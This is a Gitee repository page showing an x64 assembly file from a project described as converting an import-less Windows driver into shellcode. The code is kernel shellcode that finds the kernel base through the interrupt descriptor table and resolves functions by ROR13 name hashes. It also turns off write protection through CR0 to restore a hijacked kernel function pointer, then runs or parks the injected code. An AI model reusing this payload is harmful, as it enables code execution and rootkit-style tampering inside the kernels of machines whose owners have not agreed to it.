开源 企业版 高校版 私有云 模力方舟 AI 队友
代码拉取完成,页面将自动刷新
捐赠
捐赠前请先登录
扫描微信二维码支付
取消
支付完成
支付提示
将跳转至支付宝完成支付
确定
取消
1 Star 0 Fork 19

y11en/shellcode_driver

加入 Gitee
与超过 1400万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
已有帐号? 立即登录
文件
master
分支 (1)
master
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
项目仓库所选许可证以仓库主分支所使用许可证为准
master
分支 (1)
master
克隆/下载
克隆/下载
提示
下载代码请复制以下命令到终端执行
为确保你提交的代码身份被 Gitee 正确识别,请执行以下命令完成配置
初次使用 SSH 协议进行代码克隆、推送等操作时,需按下述提示完成 SSH 配置
1 生成 RSA 密钥
2 获取 RSA 公钥内容,并配置到 SSH公钥
在 Gitee 上使用 SVN,请访问 使用指南
使用 HTTPS 协议时,命令行会出现如下账号密码验证步骤。基于安全考虑,Gitee 建议 配置并使用私人令牌 替代登录密码进行克隆、推送等操作
Username for 'https://gitee.com': userName
Password for 'https://userName@gitee.com': # 私人令牌
master
分支 (1)
master
shell_code.asm 4.12 KB
一键复制 编辑 原始数据 按行查看 历史
亚楠人民 提交于 2018年06月21日 17:21 +08:00 . #up
extern driver_shellcode_entry:PROC
.CODE
main PROC
jmp main_start
data_orig_fnptr dq 0000000000000000h
data_orig_fnptrcode dq 0000000000000000h
kernelbase dq 0000000000000000h
one_second dq 0FFFFFFFFFF676980h
main_start:
PUSH rcx
PUSH rdx
PUSH r8
PUSH r9
PUSH rbx
PUSH rsi
PUSH rdi
PUSH r10
PUSH r11
PUSH r12
PUSH r13
PUSH rsi
MOV rsi, rsp
AND rsp, 0FFFFFFFFFFFFFFF0h
SUB rsp, 020h
SIDT [rsp]
mov r11, rcx ;小心提防WorkItem
MOV rcx, [rsp+2]
MOV rcx, [rcx+4]
CALL PEGetModuleFromAddress_ScanBack
MOV r12, rax
sub rsp,40h
mov rdx,r11
mov rcx,[kernelbase]
test rcx,rcx
jnz doentry
mov rcx,r12
doentry:
mov r12,rcx
call driver_shellcode_entry
add rsp,40h
MOV rax, [data_orig_fnptrcode]
MOV rcx, [data_orig_fnptr]
test rax,rax
jz loop_for_ever2
mov r8,cr0
and r8,0fffeffffh
mov cr0,r8
MOV [rcx], rax
mov r8,cr0
or r8, 010000h
mov cr0,r8
MOV rsp, rsi
POP rsi
POP r13
POP r12
POP r11
POP r10
POP rdi
POP rsi
POP rbx
POP r9
POP r8
POP rdx
POP rcx
MOV rax, [data_orig_fnptr]
JMP rax
loop_for_ever2:
test rcx,rcx
jnz loop_for_ever;rcx!=0,rax=0,loop for ever,rcx=rax=0,ret
MOV rsp, rsi
POP rsi
POP r13
POP r12
POP r11
POP r10
POP rdi
POP rsi
POP rbx
POP r9
POP r8
POP rdx
POP rcx
mov RAX,0C0000001h
RET
loop_for_ever:
mov edx,58586d92h
mov rcx,r12
call PEGetProcAddressH_asm
mov r13,rax
loop_1:
sub rsp,40h
mov rcx,0
mov rdx,0
lea r8,[one_second]
mov rax,0FFFFFFFFFF676980h
mov [r8],rax
call r13
add rsp,40h
jmp loop_1
main ENDP
; ----------------------------------------------------
; Search for PE header given an address. May cause page faults.
; rcx -> scan address
; rax <- header address
; ----------------------------------------------------
PEGetModuleFromAddress_ScanBack PROC
SHR rcx, 12
SHL rcx, 12
address_loop:
MOV eax, 1000h
SUB rcx, rax
MOV ax, [rcx] ; dos header magic
CMP ax, 5a4dh
JNE address_loop
MOV eax, [rcx+60] ; nt header address offset
CMP eax, 1000h
JNBE address_loop
ADD rax, rcx ; nt header address
MOV eax, [rax]
CMP eax, 00004550h ; nt header magic
JNE address_loop
MOV rax, rcx
RET
PEGetModuleFromAddress_ScanBack ENDP
; ----------------------------------------------------
; Perform ROR13 hashing
; rcx -> string ptr
; rax <- result
; ----------------------------------------------------
HashROR13A_asm PROC
PUSH rsi
PUSH rdi
MOV rsi, rcx
XOR rdi, rdi
XOR rax, rax
CLD
hash_loop:
LODSB
TEST al, al
JZ hash_loop_finish
ROR edi, 13
ADD edi, eax
JMP hash_loop
hash_loop_finish:
MOV eax, edi
POP rdi
POP rsi
RET
HashROR13A_asm ENDP
; rcx -> module base address
; rdx -> hash of exported function
; rax <- address of exported function
PEGetProcAddressH_asm PROC
; rdi = PIMAGE_EXPORT_DIRECTORY
; rsi = counter NumberOfNames
PUSH rdi
PUSH rsi
MOV edi, [rcx+60] ; nt header address offset
MOV edi, [rdi+rcx+136]
ADD rdi, rcx ; ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress + hModule
MOV r8d, [rdi+24] ; PIMAGE_EXPORT_DIRECTORY->NumberOfNames
XOR rsi, rsi
find_loop:
MOV eax, [rdi+32] ; PIMAGE_EXPORT_DIRECTORY->AddressOfNames
ADD rax, rcx ; PIMAGE_EXPORT_DIRECTORY->AddressOfNames + hModule
MOV eax, [rax+rsi*4] ; AddressOfNames[index]
ADD rax, rcx
PUSH rcx
MOV rcx, rax
CALL HashROR13A_asm
POP rcx
CMP eax, edx
JE find_loop_found
INC rsi
JMP find_loop
find_loop_found:
; found!
MOV edx, [rdi+36] ; PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals
ADD rdx, rcx ; PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals + hModule
XOR rax, rax
MOV ax, [rdx+rsi*2] ; AddressOfNameOrdinals[index]
MOV edx, [rdi+28] ; PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions
ADD rdx, rcx ; PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions + hModule
MOV eax, [rdx+rax*4] ; AddressOfFunctions[index]
ADD rax, rcx ; AddressOfFunctions[index] + hModule
POP rsi
POP rdi
RET
PEGetProcAddressH_asm ENDP
GetCR3 PROC
MOV rax, cr3
RET
GetCR3 ENDP
; ----------------------------------------------------
; Flush the CPU cache.
; ----------------------------------------------------
CacheFlush PROC
WBINVD
RET
CacheFlush ENDP
__chkstk PROC public
RET
__chkstk ENDP
END
Loading...
举报
举报成功
我们将于2个工作日内通过站内信反馈结果给你!
请认真填写举报原因,尽可能描述详细。
请选择举报类型
取消
发送
误判申诉

此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。

如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。

取消
提交

简介

无导入表的driver与shellcode化——因为SEH问题项目报废--2018年正式解封开源
取消

发行版

暂无发行版

贡献者

全部

近期动态

不能加载更多了
编辑仓库简介
简介内容
主页
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
1
https://gitee.com/yllen/shellcode_driver.git
git@gitee.com:yllen/shellcode_driver.git
yllen
shellcode_driver
shellcode_driver
master
点此查找更多帮助

搜索帮助

评论
仓库举报
回到顶部
登录提示
该操作需登录 Gitee 帐号,请先登录后再操作。
立即登录
没有帐号,去注册

AltStyle によって変換されたページ (->オリジナル) /